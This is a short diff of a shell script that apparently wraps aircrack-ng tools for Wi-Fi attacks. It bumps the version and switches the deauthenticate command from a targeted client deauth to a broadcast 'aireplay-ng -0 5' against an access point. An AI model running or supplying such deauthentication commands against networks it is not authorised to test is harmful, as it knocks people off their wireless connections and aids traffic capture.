@@ -15,7 +15,7 @@
 # * name comes from http://www.thefreedictionary.com/cleave      #
 ##################################################################
 #                                                                # 
-# last changed in version = '1.12-3'                             #
+# last changed in version = '2.1-1'                             #
 #                                                                # 
 ##################################################################
 
@@ -98,7 +98,11 @@ if [ "$1" == 'authenticate' ]; then
 fi 
 
 if [ "$1" == 'deauthenticate' ]; then 
-    aireplay-ng -0 5 -a $2 -c $3 wlan0
+    ##1. direct/targeted 
+    #aireplay-ng -0 5 -a $2 -c $3 wlan0
+    
+    ##2. broadcast
+    aireplay-ng -0 5 -a $2 wlan0
 fi 
 
 if [ "$1" == 'injection' ]; then 
